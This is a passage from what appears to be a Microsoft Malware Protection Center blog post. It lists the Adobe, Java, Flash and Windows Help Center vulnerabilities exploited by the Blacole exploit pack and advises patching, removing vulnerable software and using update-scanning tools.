• CVE-2007-5659 - Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier
• CVE-2008-2992 - Adobe Reader "util.printf" Vulnerability
• CVE-2009-0927 - Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 (multiple versions) allows remote attackers to execute arbitrary code
• CVE-2009-1671 - Java buffer overflows in the Deployment Toolkit ActiveX control in "deploytk.dll"
• CVE-2010-0188 - Adobe Acrobat Bundled Libtiff Integer Overflow Vulnerability
• CVE-2010-0840 - Sun Java JRE Trusted Methods Chaining Remote Code Execution Vulnerability
• CVE-2010-0842 - Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
• CVE-2010-0886 - Vulnerability in the Java Deployment Toolkit component in Oracle Java SE
• CVE-2010-1423 - Java argument injection vulnerability in the URI handler in Java NPAPI plugin
• CVE-2010-1885 - Microsoft Help Center URL Validation Vulnerability
• CVE-2010-3552 - Sun Java Runtime New Plugin docbase Buffer Overflow (aka "Java Skyline exploit")
• CVE-2010-4452 - Sun Java Applet2ClassLoader Remote Code Execution Exploit
• CVE-2011-2110 - Adobe Flash Player Unspecified Memory Corruption Vulnerability
• CVE-2011-3544 - Vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier

Prevention

Protection against the Blacole exploit pack requires that your third-party applications, specifically multiple components of Oracle Java and Adobe applications, are updated to the latest available and secure versions. It is important that vulnerable versions are removed and not left installed for malware to abuse and exploit.

For personal computers, there are security applications, such as the following, that offer vulnerability scanning and can assist in identifying vulnerable installations:

• Personal Software Inspector (PSI) by Secunia
• CNET TechTracker by CBS Interactive
• Software Updates Monitor (Sumo) by KC Software

And as keeping software up-to-date applies for all systems, check out "MetaQuark AppFresh" to help identify software that needs updating on Mac operating systems.

It's worth mentioning again (and without fear of being redundant!) to reduce risk against Blacole, replace insecure programs with secure versions. In conclusion, we remind you to use best practices and to use security software to promote a healthy digital ecosystem.

--Patrick Nolan, MMPC